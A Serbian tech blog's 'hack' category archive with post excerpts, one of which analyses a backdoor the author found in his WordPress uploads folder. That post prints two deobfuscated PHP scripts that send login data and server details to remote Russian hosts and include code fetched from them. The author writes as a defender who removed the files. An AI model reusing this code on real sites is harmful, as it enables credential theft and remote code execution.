Архива за 'hack' категорију

Како да видите адресу РСС довода неког твитер налога

September 10, 2011
На старом твитеру смо веома лако могли да дођемо до адресе РСС довода профила који гледамо, али је са новим твитером то на изглед постало немогуће. Али, то уопште није немогуће учинити ;) Наставите са читањем →

ImageMagick: центрирање слике на позадини

September 29, 2010
Софтверски пакет за обраду дигиталних слика ImageMagick у сарадњи са терминалом на Линуксу неке тривијалне а досадне ствари уме да убрза и олакша, а додатно и поштеди корисника од силног кликтања по програмима за обраду фотографија, чак и за једноставну интервенцију.

Nokia N900: Unboxing + српски

June 1, 2010
Снимак распакивања продајног мултимедијалног мобилног телефона Nokia N900 и виртуелна српска ћирилична тастатура за овај телефон.

Недовољно меморије за Вордпрес

April 18, 2010
Вордпрес је одличан софтвер за који постоји велики број додатака који му проширују могућности. Но, по некад су проширења комплексна или лоше оптимизована па једноставно испуне меморију предвиђену за рад Вордпреса. Зато имамо wp-config.php и WP_MEMORY_LIMIT ;)

ДВД плејер Philips DVP3350/58

March 20, 2010
Како стари ДВД уређај углавном користе деца, а ја нисам много избирљив, нови ДВД је требало да пушта DivX/XviD видео (филмове и серије), и да приказује наше титлове. После краћег разгледања одлучио сам се за PHILIPS DVP3350/58.

“Razbijanje” Linksys WRT54g Wireless Rutera

January 6, 2009
Stalno zaboravljam da postavim ovo, a par ljudi me već nekoliko puta pitalo - izvinjavam se, konačno ispravljam grešku Ovo su slajdovi sa prezentacije koju sam održao u Trstu, februara prošle godine. Tema je kratak prikaz rezultata zadatka za prethodni dan. Zadatak je bio jednostavan - trebalo jepreinstalirati firmware na ruteru WRT54g na kome su [...]

Zabavite se, ako umete

November 19, 2008
Ko ima vremena neka se zabavi, ja ga pronašla Stumble-ujući još daaavno, ali šta mi vredi kada ne umem to da uradim :D ko ume i želi da vežba, neka izvoli :) enjoy! Kliknuti ovde       

SMF 1.1.6 Remote Code Execution Exploit !

November 5, 2008
Pojavio se nezgodan exploit, tj. kombinacija više njih, koji omogućavaju instaliranje i pokretanje “zlonamernog” paketa. Ovaj exploit objedinjuje tri postojeća koja su vezana za: session code instalaciju paketa upload fajlova/attachmente Sami za sebe nisu mnogo bitni, ali u ovakvoj kombinaciji mogu da budu baš nezgodni. Dok se ne pojavi neka zakrpa trebalo bi povesti računa o attachmentima ili slikama koje se [...]

“Osigurajte” windoze

October 24, 2008
Microsoft je dosta davno odlučio da svoje korisnike tretira kao mentalno zaostale, pa je u sklopu toga odlučio da im dozvoli sva administratorska prava od početka. To direktno dovodi do gomile virusa i čuda koji vršljaju po sistemu. Dejan Vesić je napravio odličan tekst o tome te preporučujem svima, koji koriste windoze, da ga pročitaju i primene u praksi. Tako ćete napraviti sigurnosni model

www.microsoft.co.yu defaced

September 16, 2008

Backdoor na bRlogu?

September 11, 2008

Upadnem malopre sasvim slučajno u svoj wp-contents/uploads/ folder, kad ima šta i da vidim tamo: Dva PHP fajla, jedan base.php i jedan create.php, kao i jedan .htaccess fajl koji usmerava sve 404 greške na create.php. Budem radoznao, otvorim ih kad ono “obfuscated” kod, odnosno nije toliko obfuscated koliko je sve napisano u jednom redu. Ne budem lenj, otvorim ih preko PHPEdit-a koji sam dobio ranije (i za koji sam još uvek dužan da napišem review), odradim ctrl+shift+f (code beautifier) i dobijem lepo ispisan kod:

base.php

error_reporting(0); if (isset($_POST["l"]) and isset($_POST["p"])) {         if (isset($_POST["input"])) {                 $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));         } else {                 $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];         } } else {         $user_auth = ""; } if (!isset($_POST["log_flg"])) {         $log_flg = "&log"; } if (!@include_once(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {         if ($_POST["l"] == "special") {                 print "sys_active" . `uname -a`;         } }

create.php

error_reporting(0); $s = "e"; $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s"; if ((include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGZyZWUucnU=") . "/?" . $str))) { } else {         include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==") . "/?" . $str); }

Sve ovo što je base64_decode echo-ujem i vidim da je skripta napravljena da cross-site inkluduje u ovu skriptu štagod joj se prosledi sa http://hegfzzazbzbcd.users.phpfree.ru/, odnosno sa  http://hegfzzazbzbcd.users.phpcoding.ru ako ne uspe sa ove prve adrese - klasičan backdoor. Nemam pojma od kad to stoji na blogu, niti imam pojma otkud to kod mene u uploads/ folderu, i čudim se kako do sad bRlog nije deface-ovan, ali sad i da hoće neko preko toga da ga deface-uje - ne može, jer sam izbrisao skripte, i sprečio izvršavanje php skripti u uploads/ folderu.

A sad me izvin’te, odoh da proverim ostale blogove, što savetujem i vama.

Clawsker за ситна цревца

February 25, 2008

Claws Mail је напредни мултиплатформски (подржани оперативни системи: GNU/Linux, FreeBSD, Solaris, Mac OS X, Windows и Maemo) клијент за електронску пошту и дискусионе групе (nntp/news). Мали, брз, функционалан, са великим бројем напредних функција (филтери, додаци, покретање спољних конзолних програма, адресар и др). Пошто је дијалог за подешавања програма веома комплексан, т.ј. (прегледно) натрпан гомилом опција интуитивно груписаних у смислене секције, неке поставке које утичу на изглед и понашање програма остале су „скривене“ и не налазе се на овом дијалогу већ се морају ручно подесити у конфигурационој датотеци програма.

Да би се не тако мали број ових скривеих опција подесио ручно, треба знати која опција чему служи, па је очекивано да и за њих постоји нека алатка за фино штеловање „ситних цревца“. И, постоји. Зове се (more…)

Написао Александар Урошевић за блог Записи. Слободна употреба садржаја у складу са BY-CC-SA 3.0 лиценцом.

Повезани записи Априлска (0) Конверзија PXL у XLS формат (0) Угашен „Fluxmod“ (2) cupti 0.1 – српски за GOCR (2) Опера за Џ (2)

Najveći svetski superkompjuter je aktiviran

September 4, 2007
I sigurno nije ono što ste očekivali. Naime, najbrži svetski superkompjuter je aktiviran pre nekog vremena. Sastoji se od 1 do 10 miliona CPUa (zavisno od toga kojoj proceni verujete), Storm botnet bez problema tuče trenutno prvoplasirani BlueGene/L, koji jedva da ima 128k CPUa. Ako verujemo istraživanju o tipičnoj mašini, ona ima 2.3-3.3 GHz single core CPU i oko 1 GB rama. To znači da Storm

Ko se mlekom opeče…

March 22, 2007
...taj i u jogurt duva, kako kaže naš narod. Kevin Mitnick (najpoznatiji haker u istoriji) je svojevremeno hakovao The Well (cela priča o tome je ovde). Sada, 12 godina posle toga je pokušao regularno da se prijavi i plati pretplatu, na šta je dobio sledeći odgovor: From: The WELL Help Desk Date: Mar 2, 2007 11:36 AM Subject: Your registration for membership in The WELL To: mitnick@... We have

Imenovan rukovodilac odeljenja za visokotehnološki kriminal

February 27, 2007
[snip] Beograd - Posle više od godinu i po dana od donošenja Zakona o organizaciji i nadležnosti državnih organa za borbu protiv visokotehnološkog kriminala, za rukovodioca Specijalnog odeljenja za visokotehnološki kriminal u Okružnom tužilaštvu u Beogradu imenovana je tužilac Lidija Komlen Nikolić. [/snip] Pročitajte sve o tome na Internodium listi. A pročitajte i odličnu priču u Wired magazinu

Krađa podataka sa kreditne kartice

February 17, 2007
S obzirom da kartičarstvo nije bilo razvijeno kod nas, ni krađe podataka sa kreditnih kartica nisu bile česte. Međutim, u poslednje vreme su takvi događaji sve učestaliji, počev od najprostije low tech metode, kada neko jednostavno prepiše podatke sa vaše kartice (npr. kad plaćate u restoranu) pa do mnogo sofisticiranijih metoda. Evo sjajnog videa koji to ilustruje.